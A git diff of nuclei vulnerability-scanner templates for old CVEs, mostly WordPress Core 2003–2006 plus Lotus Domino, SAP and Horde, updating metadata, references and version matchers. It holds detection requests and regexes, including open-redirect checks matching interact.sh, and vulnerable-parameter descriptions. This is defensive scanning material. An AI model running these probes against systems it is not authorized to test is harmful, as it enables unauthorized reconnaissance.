b/nuclei-templates/CVE-2003/CVE-2003-1599.yaml @@ -1,17 +1,14 @@ id: CVE-2003-1599 info: - name: "WordPress Core <= 0.70 - Remote File Inclusion" + name: > + WordPress Core <= 0.70 - Remote File Inclusion author: topscoder severity: critical - description: "PHP remote file inclusion vulnerability in wp-links/links.all.php in WordPress 0.70 allows remote attackers to execute arbitrary PHP code via a URL in the $abspath variable." + description: > + PHP remote file inclusion vulnerability in wp-links/links.all.php in WordPress 0.70 allows remote attackers to execute arbitrary PHP code via a URL in the $abspath variable. reference: - - https://exchange.xforce.ibmcloud.com/vulnerabilities/12205 - - http://www.kernelpanik.org/docs/kernelpanik/wordpressadv.txt - - http://www.openwall.com/lists/oss-security/2012/01/06/3 - - http://www.securityfocus.com/bid/7785 - - http://www.osvdb.org/4611 - - https://wordpress.org/news/2003/06/wordpress-071-now-available/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/da760bcf-b252-4b88-9f54-af0a097e3295?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 diff --git a/nuclei-templates/CVE-2004/CVE-2004-1559.yaml b/nuclei-templates/CVE-2004/CVE-2004-1559.yaml index d0f9d76e3c..5a00de0ca2 100644 --- a/nuclei-templates/CVE-2004/CVE-2004-1559.yaml +++ b/nuclei-templates/CVE-2004/CVE-2004-1559.yaml @@ -1,18 +1,14 @@ id: CVE-2004-1559 info: - name: "WordPress Core < 1.2.1 - Cross-Site Scripting" + name: > + WordPress Core < 1.2.1 - Cross-Site Scripting author: topscoder severity: medium - description: "Multiple cross-site scripting (XSS) vulnerabilities in Wordpress 1.2 allow remote attackers to inject arbitrary web script or HTML via the (1) redirect_to, text, popupurl, or popuptitle parameters to wp-login.php, (2) redirect_url parameter to admin-header.php, (3) popuptitle, popupurl, content, or post_title parameters to bookmarklet.php, (4) cat_ID parameter to categories.php, (5) s parameter to edit.php, or (6) s or mode parameter to edit-comments.php." + description: > + Multiple cross-site scripting (XSS) vulnerabilities in Wordpress 1.2 allow remote attackers to inject arbitrary web script or HTML via the (1) redirect_to, text, popupurl, or popuptitle parameters to wp-login.php, (2) redirect_url parameter to admin-header.php, (3) popuptitle, popupurl, content, or post_title parameters to bookmarklet.php, (4) cat_ID parameter to categories.php, (5) s parameter to edit.php, or (6) s or mode parameter to edit-comments.php. reference: - - https://exchange.xforce.ibmcloud.com/vulnerabilities/17532 - - http://secunia.com/advisories/12683 - - http://marc.info/?l=bugtraq&m=109641484723194&w=2 - - http://www.securityfocus.com/bid/11268 - - http://securitytracker.com/id?1011440 - - https://wordpress.org/news/2005/02/strayhorn/ - - https://wordpress.org/news/2004/10/wp-121/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/e8687bf7-4172-4cc3-bd6e-830fc5fc28e9?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 @@ -36,9 +32,9 @@ http: matchers: - type: dsl dsl: - - compare_versions(version_by_generator, '< 1.2') - - compare_versions(version_by_js, '< 1.2') - - compare_versions(version_by_css, '< 1.2') + - compare_versions(version_by_generator, '<= 1.2') + - compare_versions(version_by_js, '<= 1.2') + - compare_versions(version_by_css, '<= 1.2') - type: status status: diff --git a/nuclei-templates/CVE-2004/CVE-2004-1584.yaml b/nuclei-templates/CVE-2004/CVE-2004-1584.yaml index c4d0c328ba..d2c4ae3c61 100644 --- a/nuclei-templates/CVE-2004/CVE-2004-1584.yaml +++ b/nuclei-templates/CVE-2004/CVE-2004-1584.yaml @@ -1,17 +1,14 @@ id: CVE-2004-1584 info: - name: "WordPress Core <= 1.2 - HTTP Response Splitting" + name: > + WordPress Core <= 1.2 - HTTP Response Splitting author: topscoder severity: medium - description: "CRLF injection vulnerability in wp-login.php in WordPress 1.2 allows remote attackers to perform HTTP Response Splitting attacks to modify expected HTML content from the server via the text parameter." + description: > + CRLF injection vulnerability in wp-login.php in WordPress 1.2 allows remote attackers to perform HTTP Response Splitting attacks to modify expected HTML content from the server via the text parameter. reference: - - http://marc.info/?l=bugtraq&m=109716327724041&w=2 - - http://www.securityfocus.com/bid/11348 - - http://secunia.com/advisories/12773 - - http://wordpress.org/development/2004/10/wp-121/ - - http://www.gentoo.org/security/en/glsa/glsa-200410-12.xml - - https://exchange.xforce.ibmcloud.com/vulnerabilities/17649 + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ec8ad817-9716-4d29-a02a-57eb9aa58a13?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N cvss-score: 5.3 @@ -35,9 +32,9 @@ http: matchers: - type: dsl dsl: - - compare_versions(version_by_generator, '< 1.2.1') - - compare_versions(version_by_js, '< 1.2.1') - - compare_versions(version_by_css, '< 1.2.1') + - compare_versions(version_by_generator, '<= 1.2.1') + - compare_versions(version_by_js, '<= 1.2.1') + - compare_versions(version_by_css, '<= 1.2.1') - type: status status: diff --git a/nuclei-templates/CVE-2004/CVE-2004-1965.yaml b/nuclei-templates/CVE-2004/CVE-2004-1965.yaml index 749de068b3..c1f874a540 100644 --- a/nuclei-templates/CVE-2004/CVE-2004-1965.yaml +++ b/nuclei-templates/CVE-2004/CVE-2004-1965.yaml @@ -6,6 +6,10 @@ info: severity: medium description: | Multiple cross-site scripting (XSS) vulnerabilities in Open Bulletin Board (OpenBB) 1.0.6 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) redirect parameter to member.php, (2) to parameter to myhome.php (3) TID parameter to post.php, or (4) redirect parameter to index.php. + impact: | + Successful exploitation of these vulnerabilities could lead to unauthorized access, phishing attacks, and potential data theft. + remediation: | + Upgrade to a patched version of Open Bulletin Board (OpenBB) or apply necessary security patches to mitigate the vulnerabilities. reference: - https://www.exploit-db.com/exploits/24055 - https://nvd.nist.gov/vuln/detail/CVE-2004-1965 @@ -17,8 +21,8 @@ info: cve-id: CVE-2004-1965 cwe-id: NVD-CWE-Other epss-score: 0.0113 + epss-percentile: 0.84351 cpe: cpe:2.3:a:openbb:openbb:1.0.0_beta1:*:*:*:*:*:*:* - epss-percentile: 0.82864 metadata: max-request: 1 vendor: openbb @@ -35,3 +39,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' +# digest: 4a0a0047304502200942a34b2650323617b6c0a05aed0e60c5452d3b77477cfa2760dd51678d7371022100cf0d486cba6f8042c311e7cc3134723dd8e8b86ff44b5cdb22e0adbfe3ba3776:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2005/CVE-2005-1102.yaml b/nuclei-templates/CVE-2005/CVE-2005-1102.yaml index 65c1e6b37b..1bd181ba9a 100644 --- a/nuclei-templates/CVE-2005/CVE-2005-1102.yaml +++ b/nuclei-templates/CVE-2005/CVE-2005-1102.yaml @@ -1,16 +1,14 @@ id: CVE-2005-1102 info: - name: "WordPress Core <= 1.5 - Stored Cross-Site Scripting" + name: > + WordPress Core <= 1.5 - Stored Cross-Site Scripting author: topscoder severity: medium - description: "Multiple cross-site scripting (XSS) vulnerabilities in template-functions-post.php in WordPress 1.5 and earlier allow remote attackers to execute arbitrary commands via the (1) content or (2) title of the post." + description: > + Multiple cross-site scripting (XSS) vulnerabilities in template-functions-post.php in WordPress 1.5 and earlier allow remote attackers to execute arbitrary commands via the (1) content or (2) title of the post. reference: - - http://marc.info/?l=bugtraq&m=111336102101571&w=2 - - http://security.gentoo.org/glsa/glsa-200506-04.xml - - http://bugs.gentoo.org/show_bug.cgi?id=88926 - - http://wordpress.org/support/topic.php?id=30721 - - https://wordpress.org/news/2005/05/security-update/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/1d2f973a-1fb3-4c75-8c33-6d1fadf9c906?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N cvss-score: 6.4 diff --git a/nuclei-templates/CVE-2005/CVE-2005-1687.yaml b/nuclei-templates/CVE-2005/CVE-2005-1687.yaml index 14dbad9fee..95c35b2e26 100644 --- a/nuclei-templates/CVE-2005/CVE-2005-1687.yaml +++ b/nuclei-templates/CVE-2005/CVE-2005-1687.yaml @@ -1,15 +1,14 @@ id: CVE-2005-1687 info: - name: "WordPress Core < 1.5.1 - SQL Injection" + name: > + WordPress Core < 1.5.1 - SQL Injection author: topscoder severity: high - description: "SQL injection vulnerability in wp-trackback.php in Wordpress 1.5 and earlier allows remote attackers to execute arbitrary SQL commands via the tb_id parameter." + description: > + SQL injection vulnerability in wp-trackback.php in Wordpress 1.5 and earlier allows remote attackers to execute arbitrary SQL commands via the tb_id parameter. reference: - - http://security.gentoo.org/glsa/glsa-200506-04.xml - - http://marc.info/?l=bugtraq&m=111661517716733&w=2 - - http://bugs.gentoo.org/show_bug.cgi?id=88926 - - https://wordpress.org/news/2005/05/one-five-one/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/faf3fb76-847f-447f-b6c6-49bd0d30d3c7?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 @@ -33,9 +32,9 @@ http: matchers: - type: dsl dsl: - - compare_versions(version_by_generator, '< 1.5.1') - - compare_versions(version_by_js, '< 1.5.1') - - compare_versions(version_by_css, '< 1.5.1') + - compare_versions(version_by_generator, '<= 1.5.1') + - compare_versions(version_by_js, '<= 1.5.1') + - compare_versions(version_by_css, '<= 1.5.1') - type: status status: diff --git a/nuclei-templates/CVE-2005/CVE-2005-1688.yaml b/nuclei-templates/CVE-2005/CVE-2005-1688.yaml index 3eed11f12f..098ede37ee 100644 --- a/nuclei-templates/CVE-2005/CVE-2005-1688.yaml +++ b/nuclei-templates/CVE-2005/CVE-2005-1688.yaml @@ -1,13 +1,14 @@ id: CVE-2005-1688 info: - name: "WordPress Core < 1.5.1 - Full Path Disclosure" + name: > + WordPress Core < 1.5.1 - Full Path Disclosure author: topscoder severity: medium - description: "Wordpress 1.5 and earlier allows remote attackers to obtain sensitive information via a direct request to files in (1) wp-content/themes/, (2) wp-includes/, or (3) wp-admin/, which reveal the path in an error message." + description: > + Wordpress 1.5 and earlier allows remote attackers to obtain sensitive information via a direct request to files in (1) wp-content/themes/, (2) wp-includes/, or (3) wp-admin/, which reveal the path in an error message. reference: - - http://marc.info/?l=bugtraq&m=111661517716733&w=2 - - https://wordpress.org/news/2005/05/one-five-one/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3d3b090a-71a3-4430-871d-f19ee1033e01?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 @@ -31,9 +32,9 @@ http: matchers: - type: dsl dsl: - - compare_versions(version_by_generator, '< 1.5.1') - - compare_versions(version_by_js, '< 1.5.1') - - compare_versions(version_by_css, '< 1.5.1') + - compare_versions(version_by_generator, '<= 1.5.1') + - compare_versions(version_by_js, '<= 1.5.1') + - compare_versions(version_by_css, '<= 1.5.1') - type: status status: diff --git a/nuclei-templates/CVE-2005/CVE-2005-1810.yaml b/nuclei-templates/CVE-2005/CVE-2005-1810.yaml index 417be3e0c9..9f84699835 100644 --- a/nuclei-templates/CVE-2005/CVE-2005-1810.yaml +++ b/nuclei-templates/CVE-2005/CVE-2005-1810.yaml @@ -1,19 +1,14 @@ id: CVE-2005-1810 info: - name: "WordPress Core < 1.5.1.2 - SQL Injection" + name: > + WordPress Core < 1.5.1.2 - SQL Injection author: topscoder severity: high - description: "SQL injection vulnerability in template-functions-category.php in WordPress 1.5.1 allows remote attackers to execute arbitrary SQL commands via the $cat_ID variable, as demonstrated using the cat parameter to index.php." + description: > + SQL injection vulnerability in template-functions-category.php in WordPress 1.5.1 allows remote attackers to execute arbitrary SQL commands via the $cat_ID variable, as demonstrated using the cat parameter to index.php. reference: - - http://bugs.gentoo.org/show_bug.cgi?id=94512 - - http://marc.info/?l=bugtraq&m=111817436619067&w=2 - - http://secunia.com/advisories/15517 - - http://www.osvdb.org/16905 - - http://security.gentoo.org/glsa/glsa-200506-04.xml - - http://www.securityfocus.com/bid/13809 - - http://wordpress.org/development/2005/05/security-update/ - - https://wordpress.org/news/2005/05/security-update/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/78669d4f-3c1e-49e6-af8d-56f105f99d01?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 diff --git a/nuclei-templates/CVE-2005/CVE-2005-2107.yaml b/nuclei-templates/CVE-2005/CVE-2005-2107.yaml index c94a63466c..88f14e2776 100644 --- a/nuclei-templates/CVE-2005/CVE-2005-2107.yaml +++ b/nuclei-templates/CVE-2005/CVE-2005-2107.yaml @@ -1,15 +1,14 @@ id: CVE-2005-2107 info: - name: "WordPress Core <= 1.5.1.2 - Cross-Site Scripting" + name: > + WordPress Core <= 1.5.1.2 - Cross-Site Scripting author: topscoder severity: high - description: "Multiple cross-site scripting (XSS) vulnerabilities in post.php in WordPress 1.5.1.2 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) p or (2) comment parameter." + description: > + Multiple cross-site scripting (XSS) vulnerabilities in post.php in WordPress 1.5.1.2 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) p or (2) comment parameter. reference: - - http://secunia.com/advisories/15831 - - http://www.gulftech.org/?node=research&article_id=00085-06282005 - - http://marc.info/?l=bugtraq&m=112006967221438&w=2 - - https://wordpress.org/news/2005/06/wordpress-1513/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/35ac717c-e299-4a56-bead-cb1d050da75c?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 diff --git a/nuclei-templates/CVE-2005/CVE-2005-2108.yaml b/nuclei-templates/CVE-2005/CVE-2005-2108.yaml index 2e5048bf07..37130eb0e8 100644 --- a/nuclei-templates/CVE-2005/CVE-2005-2108.yaml +++ b/nuclei-templates/CVE-2005/CVE-2005-2108.yaml @@ -1,15 +1,14 @@ id: CVE-2005-2108 info: - name: "WordPress Core < 1.5.1.3 - SQL Injection" + name: > + WordPress Core < 1.5.1.3 - SQL Injection author: topscoder severity: high - description: "SQL injection vulnerability in XMLRPC server in WordPress 1.5.1.2 and earlier allows remote attackers to execute arbitrary SQL commands via input that is not filtered in the HTTP_RAW_POST_DATA variable, which stores the data in an XML file." + description: > + SQL injection vulnerability in XMLRPC server in WordPress 1.5.1.2 and earlier allows remote attackers to execute arbitrary SQL commands via input that is not filtered in the HTTP_RAW_POST_DATA variable, which stores the data in an XML file. reference: - - http://secunia.com/advisories/15831 - - http://www.gulftech.org/?node=research&article_id=00085-06282005 - - http://marc.info/?l=bugtraq&m=112006967221438&w=2 - - https://wordpress.org/news/2005/06/wordpress-1513/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/11d53df8-f7b3-467c-8b3a-515974f1ea69?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 @@ -33,9 +32,9 @@ http: matchers: - type: dsl dsl: - - compare_versions(version_by_generator, '< 1.5.1.3') - - compare_versions(version_by_js, '< 1.5.1.3') - - compare_versions(version_by_css, '< 1.5.1.3') + - compare_versions(version_by_generator, '<= 1.5.1.3') + - compare_versions(version_by_js, '<= 1.5.1.3') + - compare_versions(version_by_css, '<= 1.5.1.3') - type: status status: diff --git a/nuclei-templates/CVE-2005/CVE-2005-2109.yaml b/nuclei-templates/CVE-2005/CVE-2005-2109.yaml index 3fa2876be2..0f91e16370 100644 --- a/nuclei-templates/CVE-2005/CVE-2005-2109.yaml +++ b/nuclei-templates/CVE-2005/CVE-2005-2109.yaml @@ -1,15 +1,14 @@ id: CVE-2005-2109 info: - name: "WordPress Core < 1.5.1.3 - Arbitrary Email Content Change" + name: > + WordPress Core < 1.5.1.3 - Arbitrary Email Content Change author: topscoder severity: medium - description: "wp-login.php in WordPress 1.5.1.2 and earlier allows remote attackers to change the content of the forgotten password e-mail message via the message variable, which is not initialized before use." + description: > + wp-login.php in WordPress 1.5.1.2 and earlier allows remote attackers to change the content of the forgotten password e-mail message via the message variable, which is not initialized before use. reference: - - http://secunia.com/advisories/15831 - - http://www.gulftech.org/?node=research&article_id=00085-06282005 - - http://marc.info/?l=bugtraq&m=112006967221438&w=2 - - https://wordpress.org/news/2005/06/wordpress-1513/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f25d0409-dbca-4c5a-9f43-fc03e5307d0f?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N cvss-score: 5.3 diff --git a/nuclei-templates/CVE-2005/CVE-2005-2110.yaml b/nuclei-templates/CVE-2005/CVE-2005-2110.yaml index 0589e60672..91c2c854e7 100644 --- a/nuclei-templates/CVE-2005/CVE-2005-2110.yaml +++ b/nuclei-templates/CVE-2005/CVE-2005-2110.yaml @@ -1,17 +1,14 @@ id: CVE-2005-2110 info: - name: "WordPress Core < 1.5.1.3 - Sensitive Information Disclosure" + name: > + WordPress Core < 1.5.1.3 - Sensitive Information Disclosure author: topscoder severity: high - description: "WordPress 1.5.1.2 and earlier allows remote attackers to obtain sensitive information via (1) a direct request to menu-header.php or a '1' value in the feed parameter to (2) wp-atom.php, (3) wp-rss.php, or (4) wp-rss2.php, which reveal the path in an error message. NOTE: vector [1] was later reported to also affect WordPress 2.0.1." + description: > + WordPress 1.5.1.2 and earlier allows remote attackers to obtain sensitive information via (1) a direct request to menu-header.php or a "1" value in the feed parameter to (2) wp-atom.php, (3) wp-rss.php, or (4) wp-rss2.php, which reveal the path in an error message. NOTE: vector [1] was later reported to also affect WordPress 2.0.1. reference: - - http://NeoSecurityTeam.net/advisories/Advisory-17.txt - - http://www.securityfocus.com/archive/1/426304/100/0/threaded - - http://secunia.com/advisories/15831 - - http://www.gulftech.org/?node=research&article_id=00085-06282005 - - http://marc.info/?l=bugtraq&m=112006967221438&w=2 - - https://wordpress.org/news/2005/06/wordpress-1513/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/bf48087a-f729-488a-8e40-f4e010ccd5a7?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L cvss-score: 7.3 diff --git a/nuclei-templates/CVE-2005/CVE-2005-2428.yaml b/nuclei-templates/CVE-2005/CVE-2005-2428.yaml new file mode 100644 index 0000000000..c74c52c360 --- /dev/null +++ b/nuclei-templates/CVE-2005/CVE-2005-2428.yaml @@ -0,0 +1,33 @@ +id: CVE-2005-2428 +info: + name: Lotus Domino R5 and R6 WebMail Default Configuration Information Disclosure + author: CasperGN + severity: medium + tags: cve,cve2005,domino + description: Lotus Domino R5 and R6 WebMail with 'Generate HTML for all fields' enabled allows remote attackers to read the HTML source to obtain sensitive information including the password hash in the HTTPPassword field, the password change date in the HTTPPasswordChangeDate field, and the client Lotus Domino release in the ClntBld field (a different vulnerability than CVE-2005-2696). + remediation: Ensure proper firewalls are in place within your environment to prevent public exposure of the names.nsf database and other sensitive files. + reference: + - http://www.cybsec.com/vuln/default_configuration_information_disclosure_lotus_domino.pdf + - https://www.exploit-db.com/exploits/39495 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2005-2428 + cwe-id: CWE-200 + +requests: + - method: GET + path: + - "{{BaseURL}}/names.nsf/People?OpenView" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: regex + name: domino-username + regex: + - '( + WordPress Core < 1.5.2 - Remote Code Execution author: topscoder severity: high - description: "Direct code injection vulnerability in WordPress 1.5.1.3 and earlier allows remote attackers to execute arbitrary PHP code via the cache_lastpostdate[server] cookie." + description: > + Direct code injection vulnerability in WordPress 1.5.1.3 and earlier allows remote attackers to execute arbitrary PHP code via the cache_lastpostdate[server] cookie. reference: - - http://secunia.com/advisories/16386 - - https://wordpress.org/news/2005/08/one-five-two/ - - https://web.archive.org/web/20110101141011/http%3A//archives.neohapsis.com%3A80/archives/fulldisclosure/2005-08/0234.html + - https://www.wordfence.com/threat-intel/vulnerabilities/id/fbe42214-0a01-4b9c-8149-68c47082d9d9?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 diff --git a/nuclei-templates/CVE-2005/CVE-2005-3634.yaml b/nuclei-templates/CVE-2005/CVE-2005-3634.yaml index f97265581d..4488b0a43c 100644 --- a/nuclei-templates/CVE-2005/CVE-2005-3634.yaml +++ b/nuclei-templates/CVE-2005/CVE-2005-3634.yaml @@ -6,6 +6,10 @@ info: severity: medium description: | frameset.htm in the BSP runtime in SAP Web Application Server (WAS) 6.10 through 7.00 allows remote attackers to log users out and redirect them to arbitrary web sites via a close command in the sap-sessioncmd parameter and a URL in the sap-exiturl parameter. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks. + remediation: | + Apply the latest security patches and updates provided by SAP to fix the open redirect vulnerability. reference: - https://www.exploit-db.com/exploits/26488 - https://cxsecurity.com/issue/WLB-2005110025 @@ -19,14 +23,14 @@ info: cve-id: CVE-2005-3634 cwe-id: NVD-CWE-Other epss-score: 0.02843 + epss-percentile: 0.897 cpe: cpe:2.3:a:sap:sap_web_application_server:6.10:*:*:*:*:*:*:* - epss-percentile: 0.89376 metadata: max-request: 1 - shodan-query: html:"SAP Business Server Pages Team" vendor: sap product: sap_web_application_server - tags: cve,cve2005,sap,redirect,business + shodan-query: html:"SAP Business Server Pages Team" + tags: cve,cve2005,sap,redirect,business,xss http: - method: GET @@ -38,3 +42,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' +# digest: 4b0a004830460221009b702e9a18c644f2a8ddd637cd2d87e35e59ec9159e4726e5b9dbf6cbe27ddcc022100e7fd499cc594ceab440e9188af24fd6eaa6f1eab4514609586796ae41b96b43f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2005/CVE-2005-4463.yaml b/nuclei-templates/CVE-2005/CVE-2005-4463.yaml index b246eaf446..fc283b4f84 100644 --- a/nuclei-templates/CVE-2005/CVE-2005-4463.yaml +++ b/nuclei-templates/CVE-2005/CVE-2005-4463.yaml @@ -1,13 +1,14 @@ id: CVE-2005-4463 info: - name: "WordPress Core < 1.5.2 - Full Path Disclosure" + name: > + WordPress Core < 1.5.2 - Full Path Disclosure author: topscoder severity: medium - description: "WordPress before 1.5.2 allows remote attackers to obtain sensitive information via a direct request to (1) wp-includes/vars.php, (2) wp-content/plugins/hello.php, (3) wp-admin/upgrade-functions.php, (4) wp-admin/edit-form.php, (5) wp-settings.php, and (6) wp-admin/edit-form-comment.php, which leaks the path in an error message related to undefined functions or failed includes. NOTE: the wp-admin/menu-header.php vector is already covered by CVE-2005-2110. NOTE: the vars.php, edit-form.php, wp-settings.php, and edit-form-comment.php vectors were also reported to affect WordPress 2.0.1." + description: > + WordPress before 1.5.2 allows remote attackers to obtain sensitive information via a direct request to (1) wp-includes/vars.php, (2) wp-content/plugins/hello.php, (3) wp-admin/upgrade-functions.php, (4) wp-admin/edit-form.php, (5) wp-settings.php, and (6) wp-admin/edit-form-comment.php, which leaks the path in an error message related to undefined functions or failed includes. NOTE: the wp-admin/menu-header.php vector is already covered by CVE-2005-2110. NOTE: the vars.php, edit-form.php, wp-settings.php, and edit-form-comment.php vectors were also reported to affect WordPress 2.0.1. reference: - - http://securityreason.com/securityalert/286 - - https://wordpress.org/news/2005/08/one-five-two/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/5bfd1650-0cc1-4b1c-9fc2-c940d841a147?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 @@ -31,9 +32,9 @@ http: matchers: - type: dsl dsl: - - compare_versions(version_by_generator, '< 1.5.2') - - compare_versions(version_by_js, '< 1.5.2') - - compare_versions(version_by_css, '< 1.5.2') + - compare_versions(version_by_generator, '<= 1.5.2') + - compare_versions(version_by_js, '<= 1.5.2') + - compare_versions(version_by_css, '<= 1.5.2') - type: status status: diff --git a/nuclei-templates/CVE-2005/cve-2005-2428.yaml b/nuclei-templates/CVE-2005/cve-2005-2428.yaml deleted file mode 100644 index 061af2a832..0000000000 --- a/nuclei-templates/CVE-2005/cve-2005-2428.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: CVE-2005-2428 -info: - name: CVE-2005-2428 - author: CasperGN - severity: medium - tags: cve,cve2005 - description: Lotus Domino R5 and R6 WebMail, with "Generate HTML for all fields" enabled, stores sensitive data from names.nsf in hidden form fields, which allows remote attackers to read the HTML source to obtain sensitive information such as (1) the password hash in the HTTPPassword field, (2) the password change date in the HTTPPasswordChangeDate field, (3) the client platform in the ClntPltfrm field, (4) the client machine name in the ClntMachine field, and (5) the client Lotus Domino release in the ClntBld field, a different vulnerability than CVE-2005-2696. - reference: - - http://www.cybsec.com/vuln/default_configuration_information_disclosure_lotus_domino.pdf - - https://www.exploit-db.com/exploits/39495 - -requests: - - method: GET - path: - - "{{BaseURL}}/names.nsf/People?OpenView" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: regex - name: domino-username - regex: - - '(Horde :: User Administration" - condition: and - type: status status: - 200 - -# Enhanced by mp on 2022/03/18 +# digest: 490a0046304402200f6ab7e5b811ae50b7feb5a05fd7996c735219dbe8a152b9c4cfd263af7405d6022054184a20298d9717f3c6263e0ca1083caa2941df71af109b0f69013ab683cec8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2005/CVE-2005-4385.yaml b/nuclei-templates/CVE-2005/cve-2005-4385.yaml similarity index 100% rename from nuclei-templates/CVE-2005/CVE-2005-4385.yaml rename to nuclei-templates/CVE-2005/cve-2005-4385.yaml diff --git a/nuclei-templates/CVE-2006/CVE-2006-0985.yaml b/nuclei-templates/CVE-2006/CVE-2006-0985.yaml index 6e98b2d993..bd90bccaf5 100644 --- a/nuclei-templates/CVE-2006/CVE-2006-0985.yaml +++ b/nuclei-templates/CVE-2006/CVE-2006-0985.yaml @@ -1,19 +1,14 @@ id: CVE-2006-0985 info: - name: "WordPress Core <= 2.0.1 - Cross-Site Scripting" + name: > + WordPress Core <= 2.0.1 - Cross-Site Scripting author: topscoder severity: high - description: "Multiple cross-site scripting (XSS) vulnerabilities in the 'post comment' functionality of WordPress 2.0.1 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) name, (2) website, and (3) comment parameters." + description: > + Multiple cross-site scripting (XSS) vulnerabilities in the "post comment" functionality of WordPress 2.0.1 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) name, (2) website, and (3) comment parameters. reference: - - https://exchange.xforce.ibmcloud.com/vulnerabilities/24957 - - http://NeoSecurityTeam.net/advisories/Advisory-17.txt - - http://secunia.com/advisories/19050 - - http://www.securityfocus.com/archive/1/426304/100/0/threaded - - http://www.vupen.com/english/advisories/2006/0777 - - http://www.securityfocus.com/archive/1/426574/100/0/threaded - - http://www.securityfocus.com/archive/1/426504/100/0/threaded - - https://wordpress.org/news/2006/03/security-202/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/dab0ddfb-6e30-4bde-95fb-90570579ff04?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 diff --git a/nuclei-templates/CVE-2006/CVE-2006-0986.yaml b/nuclei-templates/CVE-2006/CVE-2006-0986.yaml index d909201cfe..9c27eff2a8 100644 --- a/nuclei-templates/CVE-2006/CVE-2006-0986.yaml +++ b/nuclei-templates/CVE-2006/CVE-2006-0986.yaml @@ -1,18 +1,14 @@ id: CVE-2006-0986 info: - name: "WordPress Core < 2.0.2 - Sensitive Information Disclosure" + name: > + WordPress Core < 2.0.2 - Sensitive Information Disclosure author: topscoder severity: high - description: "WordPress 2.0.1 and earlier allows remote attackers to obtain sensitive information via a direct request to (1) default-filters.php, (2) template-loader.php, (3) rss-functions.php, (4) locale.php, (5) wp-db.php, and (6) kses.php in the wp-includes/ directory; and (7) edit-form-advanced.php, (8) admin-functions.php, (9) edit-link-form.php, (10) edit-page-form.php, (11) admin-footer.php, and (12) menu.php in the wp-admin directory; and possibly (13) list directory contents of the wp-includes directory. NOTE: the vars.php, edit-form.php, wp-settings.php, and edit-form-comment.php vectors are already covered by CVE-2005-4463. The menu-header.php vector is already covered by CVE-2005-2110. Other vectors might be covered by CVE-2005-1688. NOTE: if the typical installation of WordPress does not list any site-specific files to wp-includes, then vector [13] is not an exposure." + description: > + WordPress 2.0.1 and earlier allows remote attackers to obtain sensitive information via a direct request to (1) default-filters.php, (2) template-loader.php, (3) rss-functions.php, (4) locale.php, (5) wp-db.php, and (6) kses.php in the wp-includes/ directory; and (7) edit-form-advanced.php, (8) admin-functions.php, (9) edit-link-form.php, (10) edit-page-form.php, (11) admin-footer.php, and (12) menu.php in the wp-admin directory; and possibly (13) list directory contents of the wp-includes directory. NOTE: the vars.php, edit-form.php, wp-settings.php, and edit-form-comment.php vectors are already covered by 